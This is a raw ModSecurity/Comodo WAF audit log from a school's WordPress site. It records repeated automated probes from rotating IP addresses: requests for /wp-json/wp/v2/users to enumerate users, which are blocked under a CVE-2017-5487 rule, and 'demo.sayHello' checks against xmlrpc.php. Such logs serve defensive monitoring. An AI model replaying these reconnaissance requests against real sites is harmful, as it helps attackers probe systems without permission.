Content-Type: text/html; charset=iso-8859-1 --4c100977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304864604308 2993 (- - -) Stopwatch2: 1746304864604308 2993; combined=1318, p1=455, p2=832, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c100977-Z-- --20271657-A-- [04/May/2025:03:41:09 +0700] aBZ_ZcP0ZqGY3Jj2X92cuQAAABA 103.236.140.4 51396 103.236.140.4 8181 --20271657-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20271657-C-- demo.sayHello --20271657-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20271657-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304869302673 6559 (- - -) Stopwatch2: 1746304869302673 6559; combined=4638, p1=597, p2=3798, p3=36, p4=42, p5=97, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20271657-Z-- --90789715-A-- [04/May/2025:03:42:21 +0700] aBZ_rSleQJs6d7wanHHVJQAAANA 103.236.140.4 51404 103.236.140.4 8181 --90789715-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90789715-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90789715-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304941776358 2978 (- - -) Stopwatch2: 1746304941776358 2978; combined=1312, p1=446, p2=836, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90789715-Z-- --99a59613-A-- [04/May/2025:03:42:28 +0700] aBZ_tCleQJs6d7wanHHVJgAAAMQ 103.236.140.4 51408 103.236.140.4 8181 --99a59613-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --99a59613-C-- demo.sayHello --99a59613-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --99a59613-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304948930104 4349 (- - -) Stopwatch2: 1746304948930104 4349; combined=3245, p1=419, p2=2653, p3=22, p4=24, p5=75, sr=59, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99a59613-Z-- --4d542000-A-- [04/May/2025:03:42:35 +0700] aBZ_uyleQJs6d7wanHHVJwAAAM4 103.236.140.4 51412 103.236.140.4 8181 --4d542000-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d542000-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d542000-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304955801014 2611 (- - -) Stopwatch2: 1746304955801014 2611; combined=1188, p1=458, p2=703, p3=0, p4=0, p5=27, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d542000-Z-- --9b36760f-A-- [04/May/2025:03:42:43 +0700] aBZ_w0SOhfQ6W15Bgg8SIwAAAEw 103.236.140.4 51416 103.236.140.4 8181 --9b36760f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b36760f-C-- demo.sayHello --9b36760f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b36760f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304963870096 6058 (- - -) Stopwatch2: 1746304963870096 6058; combined=4469, p1=601, p2=3642, p3=34, p4=36, p5=93, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b36760f-Z-- --97b66e01-A-- [04/May/2025:03:42:51 +0700] aBZ_y0SOhfQ6W15Bgg8SJQAAAEQ 103.236.140.4 51420 103.236.140.4 8181 --97b66e01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97b66e01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97b66e01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304971321996 2370 (- - -) Stopwatch2: 1746304971321996 2370; combined=1203, p1=410, p2=761, p3=0, p4=0, p5=32, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97b66e01-Z-- --71abf608-A-- [04/May/2025:03:42:55 +0700] aBZ_zyleQJs6d7wanHHVKQAAAMs 103.236.140.4 51424 103.236.140.4 8181 --71abf608-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71abf608-C-- demo.sayHello --71abf608-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71abf608-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304975815350 5179 (- - -) Stopwatch2: 1746304975815350 5179; combined=3919, p1=458, p2=3257, p3=28, p4=28, p5=88, sr=68, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71abf608-Z-- --2ffbbc7e-A-- [04/May/2025:03:43:34 +0700] aBZ_9oOgvPi2IO4kz1sCagAAAJQ 103.236.140.4 51432 103.236.140.4 8181 --2ffbbc7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ffbbc7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ffbbc7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305014203781 2848 (- - -) Stopwatch2: 1746305014203781 2848; combined=1261, p1=463, p2=770, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ffbbc7e-Z-- --e315a864-A-- [04/May/2025:03:43:40 +0700] aBZ__MP0ZqGY3Jj2X92cvAAAABY 103.236.140.4 51436 103.236.140.4 8181 --e315a864-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e315a864-C-- demo.sayHello --e315a864-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e315a864-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305020974054 6204 (- - -) Stopwatch2: 1746305020974054 6204; combined=4568, p1=615, p2=3726, p3=33, p4=36, p5=93, sr=84, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e315a864-Z-- --ec2b566e-A-- [04/May/2025:03:44:40 +0700] aBaAOCleQJs6d7wanHHVLQAAAMM 103.236.140.4 51442 103.236.140.4 8181 --ec2b566e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ec2b566e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec2b566e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305080802866 2984 (- - -) Stopwatch2: 1746305080802866 2984; combined=1333, p1=482, p2=820, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec2b566e-Z-- --8b9add0c-A-- [04/May/2025:03:44:47 +0700] aBaAPyleQJs6d7wanHHVLgAAANY 103.236.140.4 51446 103.236.140.4 8181 --8b9add0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8b9add0c-C-- demo.sayHello --8b9add0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b9add0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305087186352 5207 (- - -) Stopwatch2: 1746305087186352 5207; combined=3836, p1=487, p2=3133, p3=23, p4=26, p5=97, sr=78, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b9add0c-Z-- --08cbc64e-A-- [04/May/2025:03:45:01 +0700] aBaATUSOhfQ6W15Bgg8SJgAAAEA 103.236.140.4 51450 103.236.140.4 8181 --08cbc64e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08cbc64e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cbc64e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305101319127 2933 (- - -) Stopwatch2: 1746305101319127 2933; combined=1347, p1=485, p2=832, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08cbc64e-Z-- --6eebf903-A-- [04/May/2025:03:45:05 +0700] aBaAUSleQJs6d7wanHHVLwAAANI 103.236.140.4 51454 103.236.140.4 8181 --6eebf903-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6eebf903-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6eebf903-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305105538519 2495 (- - -) Stopwatch2: 1746305105538519 2495; combined=1141, p1=360, p2=754, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6eebf903-Z-- --01055212-A-- [04/May/2025:03:45:06 +0700] aBaAUoOgvPi2IO4kz1sCbwAAAIA 103.236.140.4 51456 103.236.140.4 8181 --01055212-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01055212-C-- demo.sayHello --01055212-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01055212-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305106537109 5119 (- - -) Stopwatch2: 1746305106537109 5119; combined=3977, p1=482, p2=3286, p3=28, p4=31, p5=88, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01055212-Z-- --a8101b4e-A-- [04/May/2025:03:45:11 +0700] aBaAV0SOhfQ6W15Bgg8SKAAAAFc 103.236.140.4 51462 103.236.140.4 8181 --a8101b4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8101b4e-C-- demo.sayHello --a8101b4e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8101b4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305111610232 16476 (- - -) Stopwatch2: 1746305111610232 16476; combined=25218, p1=612, p2=3624, p3=32, p4=33, p5=10472, sr=82, sw=60, l=0, gc=10385 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8101b4e-Z-- --b0699e2c-A-- [04/May/2025:03:45:27 +0700] aBaAZ0SOhfQ6W15Bgg8SKQAAAFg 103.236.140.4 51466 103.236.140.4 8181 --b0699e2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0699e2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0699e2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305127098891 3353 (- - -) Stopwatch2: 1746305127098891 3353; combined=1348, p1=459, p2=857, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0699e2c-Z-- --00429d6d-A-- [04/May/2025:03:45:34 +0700] aBaAbkSOhfQ6W15Bgg8SKwAAAEU 103.236.140.4 51470 103.236.140.4 8181 --00429d6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 